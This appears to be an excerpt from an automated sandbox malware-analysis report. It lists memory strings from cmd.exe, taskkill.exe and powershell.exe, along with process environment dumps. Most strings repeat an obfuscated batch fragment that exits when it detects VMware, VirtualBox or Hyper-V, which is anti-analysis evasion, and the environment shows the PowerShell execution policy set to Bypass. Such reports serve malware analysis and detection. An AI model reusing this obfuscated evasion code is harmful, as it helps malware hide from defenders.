FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=Oj
Source: cmd.exe, 0000000B.00000003.1413686502.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=or
Source: taskkill.exe, 0000004D.00000002.1779424801.000002146F254000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=OG
Source: cmd.exe, 0000000B.00000003.1411474023.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=mN
Source: cmd.exe, 0000000B.00000003.1414500623.000002C1DCA52000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cNUMBER_OF_PROCESSORS=2o=dOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=op
Source: cmd.exe, 0000000B.00000003.1421962374.000002C1DCA56000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=ePath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fr=gs=hSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iTEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kw=lwindir=C:\Windowsx=my=nz=oj
Source: taskkill.exe, 00000054.00000002.1822051156.000001B9D94C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit /b
Source: cmd.exe, 0000000B.00000003.1441436985.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%rSidEOFKb%RBQBVavYbHFNCHgULy%FZEZytkVUlPfSsjdd%PAGAviKZcRctOmhcN%nRPaeLgijflMFxiH%yrudAalWkWaWBRM%HuojAUNODxLvYras%qaZIQYrUKapfffJCj%OLycHAPPizmhfUWq%DjddDOjzQjwlAyiAa%SalgYZpOvgiIrxBKqac%NyzftuFmaZMdAYn%HFggyaTYugcuTwIMp%XxLpJzAgj%"=="Microsoft Corporation" if "%dyGekKzIq%QGCXmIYbRaPKVljWS%SFjxtsIZTdfbTIVMFZY%hhaoSTIVKKgIdqLOfR%tBlMcjzxiQoJazG%sUpijttaaKGTcrU%IcTTvOpz%"=="Virtual Machine" exit\nif "%RSwzNHyfa%zyZfUdAybVIWrwPC%WuJxFnGQeUHwquaK%rJJznxsecvtrBggY%sQniHhlrjEdYkDHq%bUrtDWRVSfMmQWnlaC%jDyXKhYvmKGaVRsV%bqxxsgmTPIwbZiG%ZdgWwSBigLMfnjTJz%mfJNznTXjMBsoiXJOg%BMlukJdggCBYuGA%GFVaLptyHQlxIpaE%BalxeNxgsZiGoJAY%OzHutdjL%"=="VMware, Inc." exit\nif "%OxkSRwDO%DIQVAFRbxNeclWRg%WzUEpvndKgDYYXNPS%JONgxjdzkMdxvrWz%vXgVousbjMwnsRf%bqSDzdLgkajxGVrSba%uTenQde%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=ONNGS
Source: powershell.exe, 00000029.00000002.1870747846.000000C0000CE000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O=::=::\=C:=C:\Users\user\Desktop=ExitCode=00000000a=pA1=PALLUSERSPROFILE=C:\ProgramDataans=835122APPDATA=C:\Users\user\AppData\Roamingb=qB1=Qc=rC1=RCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exed=sD1=SDriverData=C:\Windows\System32\Drivers\DriverDatae=tE1=Tf=uF1=UFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=Defaultg=vG1=Vh=wH1=WHOMEDRIVE=C:HOMEPATH=\Users\useri=xI1=Xj=yJ1=Yk=zK1=ZKDOT=GkvsNxWVwqgRFfnZdyui297TIpYMQb8XaEBtmJ4LeSorh5CPOKD3UHA0czlj61 l=aL1=ALOCALAPPDATA=C:\Users\user\AppData\LocalLOGO
Source: taskkill.exe, 00000055.00000002.1826420460.0000022BDAEB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif "%OsDKwVzNU%SVsXrnjRzbMMdThZlMy%zOYvoUadunZYwHaL%rBEfReLkosoYRBCab%rOfxBNztkqwXodCsi%dDBvtrKaarMepAQw%xEkHLwXz%"=="VirtualBox" exit n=cN1=CNUMBER_OF_PROCESSORS=2o=dO1=DOneDrive=C:\Users\user\OneDriveOS=Windows_NTp=eP1=EPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPLPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSExecutionPolicyPreference=BypassPSModulePath=C:\Users\user\Documents\WindowsPowerShell\Modules;C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\Publicq=fQ1=Fr=gR1=Gs=hS1=HSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\Windowst=iT1=ITEMP=C:\Users\user~1\AppData\Local\TempTMP=C:\Users\user~1\AppData\Local\Tempu=jU1=JUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userv=kV1=Kw=lW1=Lwindir=C:\Windowsx=mX1=My=nY1=Nz=oZ1=O
Source: cmd.exe, 0000000B.00000003.1491716510.000002C1DCA50000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \nif "%pRRskkyxH%TxdoRBmbqzyDVqyq%PgoZqotPpEsJcYkgv%oIMCIYPcwKpRXwK%hZOpTayxjdmkYSTjwD%isoMMZLfuBkSCvSyyG%qCQhJEFampksrwfrH%CijJlvWCTruCJCKdl%fqmJILLziDUrkvnqn%kmYFUdkjVrRsAkRgE%ObkWUkGgYulxXHBAg%oRwulXKHtPlwIBGZgl%urTGZNVgFfZlhAgG%CRTkCOGlG%"=="Microsoft Corporation" if "%qZeNCZQ%wmXNiBYbPdfGrqJTw%zryaeCiiDdiFTXMmAh%QVIQwReasfWDTDlvM%AgRBROmTOtYYoineiSN%dYnsVHrFmacxxSXvQ%tWLEIVCk%"=="Virtual Machine" exit\nif "%xRBQinlJp%mbrgPxxAzbmdwePzaaH%MmGCkpHprbHzNBCL%mfpYqPqngcewVYgCrL%YPqZvLxjPlulEQkM%foIJfWFnRubkbHmJkS%pScwvjKLppAAsqLazCm%nslqyZxurJOtEixMMO%MbqOKcliRtUghUY%AWjPTCANrjVNHgbGQ%zMexKLWbgIYRTWUrvB%nXCkplftFHEScSuGg%SQDhLiegIuuTSdV%FhVxegw%"=="VMware, Inc." exit\nif 